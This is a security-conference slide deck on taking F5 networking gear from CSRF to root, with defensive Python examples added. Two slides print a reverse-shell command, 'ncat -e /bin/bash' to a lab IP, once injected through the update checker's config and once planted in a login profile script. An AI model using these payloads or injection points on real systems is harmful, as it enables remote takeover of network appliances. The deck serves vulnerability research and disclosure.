Hacking Networking Gear F5
Ron Bowes - @iagox86
From CSRF to Root
December 2, 2022
https://infosec.exchange/@iagox86
1
Agenda
2
Introduction
3
Me
Clang
(like the compiler)
Sharp
(like C#)
Ron
(just Ron)
4
This talk
5
Why F5?
A few reasons I chose this target:
6
Initial Analysis
A few leads, a few dead-ends
7
Attack surface - netstat
It's a Linux system w/ standard CLI tools (like netstat, ncat, socat, strace, etc.)
We'll explore a bit, then come back to a few things
Some ideas (in no real order):
8
Attack surface - Apache modules
Custom Apache modules - network-facing low-level code!
CVE-2022-1388 was a remote root vulnerability in a module
Enumerate w/ "httpd -M"
9
Attack surface - Apache modules
There's certainly interesting code - like raw RSA, cookie processing, "database" (MCP) queries, etc
Ultimately, didn't find much interesting
10
Attack surface - Apache authentication
Authentication uses PAM - from httpd.conf (Apache's config file):
And PAM has a custom module:
11
Attack surface - PAM authentication module
But, it's largely a blocklist (or allowlist) with some other features:
12
Attack surface - What about CGI?
"apachectl status"
Four CGI scripts, had to reverse engineer to figure out arguments
13
Attack surface - CGI scripts - mpqd
"Seems like some sorta DB thing?" --my notes
14
Attack surface - CGI scripts - rrdstats
A thin wrapper around a shell utility - requires auth, but no CSRF protection - probably worth fuzzing
15
Attack surface - CGI scripts - rtstats
Another stats-type query - didn't seem to be anything interesting
16
Attack surface - CGI scripts - iControlPanel.cgi
It's a SOAP interface!
We'll come back to this later. :)
17
Attack surface - Startup Services
/var/service = startup stuff
Lots of interesting stuff here!
18
Attack surface - f5_update_checker?
19
Attack surface - f5_update_checker?
It runs, parses a config file, does an insecure curl, and... nothing on the device uses it? A long-forgotten script?
20
Attack surface - f5_update_checker
<-- I reversed the file format; it looks like this
Log output when you reboot:
21
Attack surface - f5_update_checker
Command injection!
Can create root backdoor...
...if you already have root :(
We'll come back to this :)
My notes -->
22
Attack surface - Summary
What we learned:
23
MCP
F5's database
24
What's MCP?
From what I can tell, a proprietary / not-publicly-documented datastore
Accessed via /var/run/mcp
AF_UNIX socket with 0777 permissions
25
Building queries
We know how to run queries, so...
26
"Reversing" MCP (aka, breaking stuff)
Can we steal the socket?
Yup! Note: this kills the device (until you reboot)
27
"Reversing" MCP (aka, breaking stuff)
Can we MitM? Yup! "rm" the socket, then:
This doesn't (immediately) break the device, but can't be good for it :)
Request
28
"Reversing" MCP (aka, breaking stuff)
Can we replay? Yup!
Same Request we saw
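The slides above show that whoever can reach the socket can steal, proxy or replay MCP traffic, and the 0777 socket node means that is every local user. The following is an added example, not code from the talk or from F5, showing the two controls a local daemon of this kind would normally have: a socket node created with restrictive permissions, and a check of the kernel-reported peer uid (Linux SO_PEERCRED) before acting on a request. The socket path, the request bytes and the allowed uid set are constructed for the demo; the Linux-only SO_PEERCRED option is an assumption about the platform.

```python
"""Peer-credential check on a Linux AF_UNIX stream socket (constructed example)."""
import os
import socket
import stat
import struct
import tempfile
import threading


def peer_credentials(conn):
    """Return (pid, uid, gid) of the process at the other end of `conn`.

    SO_PEERCRED is filled in by the kernel at connect time, so a client
    cannot forge it the way it could forge a field inside the request body.
    """
    raw = conn.getsockopt(socket.SOL_SOCKET, socket.SO_PEERCRED,
                          struct.calcsize("3i"))
    return struct.unpack("3i", raw)


def bind_restricted(path):
    """Create a listening socket whose filesystem node is 0600, not 0777."""
    old_umask = os.umask(0o177)  # bind() honours umask: 0777 & ~0177 == 0600
    try:
        srv = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        srv.bind(path)
    finally:
        os.umask(old_umask)
    srv.listen(1)
    return srv


def serve_one_request(srv, allowed_uids, result):
    """Accept one client, decide on the kernel-reported uid, record the outcome."""
    conn, _ = srv.accept()
    with conn:
        _pid, uid, _gid = peer_credentials(conn)
        request = conn.recv(1024)
        conn.sendall(b"OK" if uid in allowed_uids else b"DENY")
        result["uid"] = uid
        result["request"] = request


def exchange(allowed_uids, request=b"create-user admin"):
    """Run server and client in-process; return (reply, socket node mode, peer uid)."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "mcp.sock")  # constructed path, not the real /var/run/mcp
        srv = bind_restricted(path)
        result = {}
        t = threading.Thread(target=serve_one_request,
                             args=(srv, allowed_uids, result))
        t.start()
        cli = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        cli.connect(path)
        cli.sendall(request)
        reply = cli.recv(16)
        cli.close()
        t.join(timeout=5)
        mode = stat.S_IMODE(os.stat(path).st_mode)
        srv.close()
        return reply.decode(), mode, result["uid"]


def demo():
    """Same request from the current uid: allowed once, denied when the allowlist excludes us."""
    me = os.getuid()
    ok_reply, mode, seen_uid = exchange({me})
    deny_reply, _, _ = exchange({me + 1})
    return ok_reply, deny_reply, mode, seen_uid == me


if __name__ == "__main__":
    print(demo())  # ('OK', 'DENY', 384, True); 384 == 0o600
```

Neither control stops a root-level process from proxying the socket, which is why the later slide calls the MitM a research tool rather than a vulnerability; they do stop an unprivileged local user from issuing queries or replaying captured ones.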
29
MCP Protocol
I reversed the whole protocol, with:
30
MCP Protocol - Tool to build / parse queries
I built a tool: https://github.com/rbowes-r7/refreshing-mcp-tool
31
MCP Protocol - Tool to create accounts
mcp-privesc.rb creates a new root-level account
(root is not required to make these queries!)
32
MCP Protocol - MitM
Not a vulnerability - requires a root login
But, a research tool!
(Sometimes breaks things)
33
SOAP
Getting dirty!
34
Exploring SOAP
WSDL files are available on the host
35
Exploring SOAP
Use advanced analysis techniques ("grep") to get all the names, then advanced data-mining ("grep") to find interesting ones
36
Exploring SOAP
This requires an account, but bear with me!
(I'll share a GitHub link with all this later)
"Password1"
37
Exploring SOAP
I learned how to make SOAP requests so you don't have to :)
"Hello world!"
38
Exploring SOAP
Problem: SELinux, of all things!
39
Exploiting SOAP
So wouldn't it be cool if...
40
Exploiting SOAP 1: Bypass authentication
Enter: Cross-site Request Forgery (CSRF)!
41
Exploiting SOAP 1: CSRF
It's a bit clunky, but we can run HTML code (left) in the user's browser, which sends a legal SOAP request (below)
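The CSRF works because the SOAP endpoint accepts a cookie-authenticated POST with nothing that a page on another origin cannot supply. The following is an added example, not code from the talk or from F5, of the server-side gate that closes that gap: it rejects a request unless its fetch metadata, Origin/Referer, content type and SOAPAction header all match what the device's own pages send. The allowed origin, the header sets and the SOAPAction value are constructed for the demo.

```python
"""Server-side CSRF gate for a cookie-authenticated SOAP endpoint (constructed example)."""

ALLOWED_ORIGINS = {"https://bigip.example.internal"}  # assumption: the device's own origin
SOAP_MEDIA_TYPES = {"text/xml", "application/soap+xml"}


def media_type(content_type):
    """'text/xml; charset=utf-8' -> 'text/xml'; compare the exact type, not a substring."""
    return content_type.split(";", 1)[0].strip().lower()


def csrf_verdict(headers):
    """Return (allowed, reason) for one request's headers (names compared case-insensitively).

    Each rule is one a cross-site HTML form cannot satisfy on its own:
      1. Sec-Fetch-Site, when the browser sends it, must be same-origin, same-site or none.
      2. Origin (or, failing that, Referer), when present, must be in the allowlist.
      3. Content-Type must be an XML SOAP type; a form can only send
         application/x-www-form-urlencoded, multipart/form-data or text/plain.
      4. SOAPAction must be present; a custom header forces a CORS preflight,
         and the preflight is refused for origins outside the allowlist.
    """
    h = {k.lower(): v for k, v in headers.items()}
    site = h.get("sec-fetch-site")
    if site is not None and site not in ("same-origin", "same-site", "none"):
        return False, "cross-site fetch metadata"
    origin = h.get("origin")
    if origin is not None and origin not in ALLOWED_ORIGINS:
        return False, "origin not allowed"
    if origin is None and "referer" in h:
        ref = h["referer"]
        if not any(ref == o or ref.startswith(o + "/") for o in ALLOWED_ORIGINS):
            return False, "referer not allowed"
    if media_type(h.get("content-type", "")) not in SOAP_MEDIA_TYPES:
        return False, "not a SOAP content type"
    if "soapaction" not in h:
        return False, "missing SOAPAction"
    return True, "ok"


SAMPLE_REQUESTS = {  # constructed header sets, one per scenario
    "same-origin xhr": {
        "Origin": "https://bigip.example.internal",
        "Sec-Fetch-Site": "same-origin",
        "Content-Type": "text/xml; charset=utf-8",
        "SOAPAction": "urn:example:Operation",
        "Cookie": "session=placeholder",
    },
    "cross-site form, modern browser": {
        "Origin": "https://attacker.example",
        "Sec-Fetch-Site": "cross-site",
        "Content-Type": "text/plain",
        "Cookie": "session=placeholder",
    },
    "cross-site form, no fetch metadata": {
        "Origin": "https://attacker.example",
        "Content-Type": "text/plain",
        "Cookie": "session=placeholder",
    },
    "no origin, form content type": {
        "Content-Type": "text/plain",
        "Cookie": "session=placeholder",
    },
    "same-origin, no SOAPAction": {
        "Origin": "https://bigip.example.internal",
        "Sec-Fetch-Site": "same-origin",
        "Content-Type": "application/soap+xml",
        "Cookie": "session=placeholder",
    },
}


def demo():
    """Verdict for every sample scenario."""
    return {name: csrf_verdict(h) for name, h in SAMPLE_REQUESTS.items()}


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name:40} {verdict}")
```

The content-type rule alone already defeats a plain form post, but it only holds if the server compares the exact media type; a check such as "contains xml" would let a crafted text/plain body through, so the other three rules are kept as independent layers.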
42
Exploiting SOAP 2: Bypass SELinux
Remember this slide from earlier?
I wonder if we can write to /shared/f5_update_action?
Let's try it!
43
Exploiting SOAP 2: Bypass SELinux
Upload our own /shared/f5_update_action
AAA
https://localhost/success`ncat -e /bin/bash 10.0.0.179 4444
https://localhost/error
0
0
0
0
44
Exploiting SOAP 2: Bypass SELinux
Then wait for a reboot (technically there's a "reboot_system" SOAP endpoint, but rebooting a load balancer is probably a bad idea)
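The root cause on these slides is a URL read from a config file and spliced into a shell command line, so a backtick in the URL becomes a command. The following is an added example, not the f5_update_checker code or anything from the talk, contrasting that pattern with the fix a practitioner would want: build an argv list (shell metacharacters are then inert), end the options with `--` so a URL starting with `-` cannot become a curl option, allowlist the scheme, and reject characters that cannot occur in a URL at all. The scheme allowlist and the sample URLs are constructed assumptions; `unsafe_shell_line` only returns the string and never runs it.

```python
"""Building a fetch command from a config-file URL without a shell (constructed example)."""
import string
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"https"}  # assumption: the checker only needs HTTPS

# RFC 3986 unreserved + reserved + percent; backtick, space, quotes, <>, {}, |, \ and ^ are absent
URL_CHARS = set(string.ascii_letters + string.digits + "-._~:/?#[]@!$&'()*+,;=%")


def unsafe_shell_line(url):
    """The pattern the slides call 'insecure curl': the URL is spliced into a
    shell command line, so backticks, $( ), ; and & inside it are interpreted
    by the shell. Returned as a string for illustration only; never execute it."""
    return "curl -s " + url


def build_fetch_argv(url):
    """Return an argv list for curl, or raise ValueError for a URL that should not be fetched."""
    if any(ch not in URL_CHARS for ch in url):
        raise ValueError("illegal character in URL")
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        raise ValueError(f"scheme {parts.scheme!r} not allowed")
    if not parts.netloc:
        raise ValueError("URL has no host")
    # '--' ends option parsing: a URL such as "-o/tmp/x" stays a URL, not a curl flag
    return ["curl", "--silent", "--fail", "--", url]


def check(url):
    """'accepted' or the rejection reason, for one config line under review."""
    try:
        build_fetch_argv(url)
        return "accepted"
    except ValueError as exc:
        return str(exc)


if __name__ == "__main__":
    for sample in ("https://localhost/success",      # constructed samples
                   "https://localhost/success`id`",
                   "file:///etc/passwd",
                   "-o/tmp/x",
                   "https://localhost/success;a=1&b=2"):
        print(f"{sample:40} {check(sample)}")
```

Note that `;` and `&` are legal URL characters and pass the character check; in the argv form they are harmless, which is why the argv construction is the actual fix and the character allowlist is only a second layer that makes a tampered config line visible in review.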
45
Exploiting SOAP 2: Bypass SELinux (method 2)
One file in /etc/profile.d is actually okay to replace
46
Exploiting SOAP 2: Bypass SELinux (method 2)
Just write commands to /etc/profile.d/timeout.sh, then wait for somebody to log in
ncat -e /bin/bash 10.0.0.179 4444 & disown;
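Both persistence paths on these slides, and the MCP socket earlier, come down to a node on disk that the wrong principal can write: a world-writable AF_UNIX socket under /var/run, and a replaceable script in a directory that every login shell sources. The following is an added example, not code from the talk or from F5, of a small audit that walks a tree and reports world-writable files and sockets, with a constructed temp directory standing in for /var/run and /etc/profile.d. The directory layout and file names in the demo are made up for the test.

```python
"""Audit a directory tree for world-writable files and socket nodes (constructed example)."""
import os
import socket
import stat
import tempfile


def audit_tree(root):
    """Return sorted [(path, kind, mode)] for every node under root that others can write.

    kind is 'socket' for AF_UNIX socket nodes (world-writable means any local
    user can connect) and 'file' otherwise (a world-writable script in a
    login-sourced directory runs as whoever logs in next). Symlinks are skipped
    because their own mode bits are meaningless.
    """
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except FileNotFoundError:
                continue  # transient node vanished during the walk
            if stat.S_ISLNK(st.st_mode):
                continue
            mode = stat.S_IMODE(st.st_mode)
            if mode & stat.S_IWOTH:
                kind = "socket" if stat.S_ISSOCK(st.st_mode) else "file"
                findings.append((path, kind, mode))
    return sorted(findings)


def demo():
    """Build a constructed tree with two bad and two acceptable nodes; return relative findings."""
    with tempfile.TemporaryDirectory() as root:
        run_dir = os.path.join(root, "run")
        prof_dir = os.path.join(root, "profile.d")
        os.mkdir(run_dir)
        os.mkdir(prof_dir)

        socks = []
        for name, mode in (("mcp.sock", 0o777), ("private.sock", 0o660)):
            s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
            s.bind(os.path.join(run_dir, name))
            os.chmod(os.path.join(run_dir, name), mode)
            socks.append(s)

        for name, mode in (("timeout.sh", 0o666), ("ok.sh", 0o644)):
            p = os.path.join(prof_dir, name)
            with open(p, "w") as f:
                f.write("# constructed placeholder script\n")
            os.chmod(p, mode)

        findings = [(os.path.relpath(p, root), kind, mode)
                    for p, kind, mode in audit_tree(root)]
        for s in socks:
            s.close()
        return findings


if __name__ == "__main__":
    for path, kind, mode in demo():
        print(f"{kind:6} {oct(mode)} {path}")
```

Run against a real host the same function would be pointed at /var/run and /etc/profile.d; on a hardened system the expected output is empty, and any socket hit deserves the SO_PEERCRED question from the MCP section as well.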
47
Exploiting SOAP 3: Get ponies
Sorry, there are no ponies
48
Putting it all together
And into Metasploit!
49
Tools
Open source implementation of MCP:
Demo SOAP exploit / PoC:
50
Metasploit modules
I wrote Metasploit modules for:
Time to demo whatever we have time for!
(the next pile of slides are screenshots, since we're probably outta time)
51
Metasploit module - CSRF / SOAP (CVE-2022-41622)
52
Metasploit module - RPM SPEC injection (CVE-2022-41800)
53
Metasploit module - Privesc via /var/run/mcp
54
Metasploit module: post/module/gather/f5_enum_users
55
Metasploit module: post/module/gather/f5_enum_db_variables
56
Metasploit module: post/module/gather/f5_passwords
57
Q&A / Contact
58
Questions, if we have time!
Otherwise:
59